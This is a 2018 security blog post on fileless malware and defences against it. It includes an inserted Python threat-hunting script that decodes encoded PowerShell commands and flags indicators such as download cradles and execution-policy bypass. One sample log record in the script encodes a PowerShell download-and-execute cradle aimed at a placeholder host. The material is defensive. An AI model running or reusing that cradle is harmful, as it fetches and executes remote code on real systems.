Fight Fileless Malware on All Fronts

Tuesday, November 06, 2018

Phil Richards


Take a unified approach: patch and protect all elements of your ecosystem to prevent new attacks.

The Ponemon Institute estimates that more than half of all attacks against businesses in 2017 were fileless. Cyber criminals continue to find new, creative ways to disrupt organizations, and a new favorite that gained traction last year is fileless malware. No doubt, 2018 statistics, when compiled, will indicate fileless malware is among the most prevalent attack types, as attackers exploit capabilities in Microsoft’s PowerShell, Windows Management Instrumentation (WMI) and the macOS shell.

Cyber Criminals Love Fileless

The recent trend of fileless malware is part of a larger cybercrime story, that of attackers using a variety of scripts to introduce malware or command and control capabilities into an enterprise. PowerShell, for example, is mainly used to automate administration tasks, including managing configurations of systems and servers. It has been exploited by scripting malware families like W97/Downloader, Kovter fileless malware, Nemucod and other JavaScript downloaders.

One of the latest examples of fileless malware and script attacks was the heist of close to $1 million from a Russian bank. The cyber criminal group, known as MoneyTaker, is believed to have conducted more than 20 successful attacks on financial institutions and legal firms in Russia, the UK and the U.S. Researchers estimate a total figure of $14 million, from 16 U.S. targets, five Russian banks and one hack of a UK banking-software firm. As reported, the group used widely available tools including PowerShell, Visual Basic and the Metasploit exploit framework, plus their own custom-made fileless malware, to hack into these networks.

Why Fileless Works so Well

Fileless malware has become the darling of cyber criminals because, quite simply, it’s a no-brainer. Rather than wait for some human to open a phishing email or an inadequately protected application, fileless malware works with what is already in your network, i.e., the day-to-day scripting tools enterprises use, like PowerShell, VBScript or JavaScript. It is easier to conduct an exploit and harder to detect. The malware can be executed entirely from the command line, and with capabilities such as executing base64-encoded commands, it may be very difficult to see the malware running. Fileless malware typically does not require downloading additional malicious files – the attacker simply executes a command with arguments on the command line. These commands, however, are capable of stealing data and credentials, spying on IT environments, and leaving back doors open to further exploits. Another tactic is to exploit in-memory access and already-running applications, such as web browsers and Office applications, to conduct malicious behavior.

A fileless infection could be malicious code or data that exists only in memory. It isn’t installed to the target computer’s hard drive. Written directly to RAM, the code is injected into a running process where it can be used for the exploit. And, since it doesn’t exist as a true file, it can often go undetected by antivirus software and intrusion prevention systems. This “zero footprint” intrusion leverages legitimate programs and data to perform desired tasks, while remaining nearly undetectable using traditional detection methods. The infection can remain live until the system is rebooted and the fileless malware is purged from the infected system’s memory, enabling attackers to steal data or download more persistent malware to use in future attacks.

Fighting Back against Fileless

Fileless malware is particularly insidious since traditional antivirus solutions simply aren’t enough of a defense. It has prompted security teams to take a multi-faceted approach to detecting threats and preventing new attacks. ‘Threat hunting’ includes actions such as: log analysis of all network devices to detect threat activity like unusual domain name system (DNS) requests or suspicious registry or system file changes; establishing a baseline of approved network traffic; examining behavioral attributes of network users; and understanding baseline endpoint activity of applications and users to detect suspicious activity.
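The base64-encoded command lines described above and the log analysis described here come together in the kind of triage an analyst would run over process-creation records. The following is an added example (not the author's or Ivanti's code) that decodes any `-EncodedCommand` argument it finds in a record and scores the record against a small set of defensive indicators; the log format, the indicator set and the sample records are all constructed for this illustration.

```python
import base64
import re

# PowerShell's -EncodedCommand takes base64 of the UTF-16LE command text; the
# engine also accepts unambiguous prefixes of the flag name (-e, -ec, -enc).
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")

# Defensive indicators matched (case-insensitively) against the raw record plus the
# decoded command text. Each is a pattern an analyst would expect to see in a
# script-based, fileless download-and-execute attempt. Constructed for this example.
INDICATORS = {
    "invoke-expression": r"\binvoke-expression\b|\biex\b",
    "download-cradle": r"downloadstring|downloadfile",
    "hidden-window": r"-w(?:indowstyle)?\s+hidden",
    "policy-bypass": r"-(?:executionpolicy|exec|ep)\s+bypass",
    "nested-base64": r"frombase64string",
    "office-parent": r"parentimage=(?:winword|excel|powerpnt|outlook)\.exe",
}

def decode_encoded_command(b64):
    """Recover the command text hidden behind -EncodedCommand, or None if it is not valid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_line(line):
    """Decode any encoded command in one process-creation record and score it."""
    match = ENCODED_FLAG.search(line)
    decoded = decode_encoded_command(match.group(1)) if match else None
    haystack = (line + " " + (decoded or "")).lower()
    hits = sorted(name for name, pat in INDICATORS.items() if re.search(pat, haystack))
    return {"encoded": match is not None, "decoded": decoded,
            "indicators": hits, "suspicious": bool(hits)}

def hunt(lines):
    """Return (record, analysis) pairs for records that deserve analyst attention."""
    results = [(line, analyze_line(line)) for line in lines]
    return [(line, r) for line, r in results if r["suspicious"]]

def encode_for_powershell(command):
    """Build what an -EncodedCommand argument looks like, to construct sample records."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

# Constructed sample records in a simplified Sysmon Event 1 / Security 4688 style;
# they are invented for this example, not taken from any real incident.
SAMPLE_LOGS = [
    "ParentImage=explorer.exe CommandLine=powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1",
    "ParentImage=WINWORD.EXE CommandLine=powershell.exe -nop -w hidden -ep bypass -enc "
    + encode_for_powershell("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"),
    "ParentImage=cmd.exe CommandLine=powershell.exe -EncodedCommand " + encode_for_powershell("Get-Date"),
]

if __name__ == "__main__":
    for line, r in hunt(SAMPLE_LOGS):
        print("ALERT", r["indicators"], "decoded:", r["decoded"])
```

Only the Office-spawned, hidden-window record is reported; the encoded but benign `Get-Date` record is decoded for review without raising an alert, which is the distinction a baseline of normal endpoint activity is meant to support.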

How can fileless malware be avoided? The short answer, given the increasing popularity of these attacks, is that you need to do it all: take a unified approach, look across your entire enterprise, and apply threat-prevention practices wherever possible.

Here are recommended practices for a unified IT approach to fighting back against fileless malware:

  1. Patch Management is critical to preventing attacks of all kinds. Make sure your endpoints and servers are included in the patch cycle to optimize threat protection. And apply those Microsoft patches in a timely fashion! For example, the Microsoft August patch list contained two zero-day vulnerabilities: CVE-2018-8373 [Internet Explorer] and CVE-2018-8414 [Windows Shell]. Given there are known exploits, you should give these fixes top priority.
  2. Advanced Application Control prevents malicious software as well as scripts from executing. By restricting unnecessary scripting languages, you can limit the frameworks that can be used to secretly execute commands on the host system.
  3. Disable Macros and apply memory protection techniques. If you can’t disable macros, consider applying technology to digitally sign macros that are authorized for use by the organization.
  4. Most Advanced Antivirus Technology gives you the most powerful means of addressing the threat at the kernel level.
  5. Privilege Management is essential to limiting threats by giving users the exact level of rights they need to get their job done, and nothing beyond that. Following strict privilege practices helps ensure user credentials – if compromised – don’t allow cyber criminals access to OS tools that will introduce a fileless infection.
  6. Isolation Policies are also effective against fileless attacks. They can limit the reach of any fileless malware intrusion.
  7. Insight Tools can afford a better view into your most vulnerable systems, using techniques such as Web Application Firewalls (WAFs) to protect potentially exposed systems.
  8. Enforce Policies on removable devices. Locking down user devices, such as flash drives, can further prevent fileless malware exposure.

What’s Next?

“The time it takes cybercriminals to compromise a system is often just a matter of minutes—or even seconds. They don’t need much time to extract valuable data—they usually have much more than they need as it typically takes organizations weeks or months to discover a breach.” That cautionary note comes from Verizon’s 2018 Data Breach Investigations Report. Verizon reported that 68% of the breaches took months or longer to discover, and, compounding the problem, many breaches are discovered by customers, damaging a company’s brand reputation.

The MoneyTaker group was reported to have spent months investigating a target’s network, in order to elevate system privileges to those of a domain administrator, then to remain active inside the network following the heist.

The message here is: taking a unified approach – enforcing every possible security policy to prevent these attacks and exercising constant vigilance – is the only way to fight back against fileless malware!

About the author: Phil Richards is the Chief Information Security Officer (CISO) for Ivanti. Prior to Ivanti he has held other senior security positions including the Director of Operational Security for Varian Medical Systems, Chief Security Officer for Fundtech Corporation and Business Security Director for Fidelity Investments.
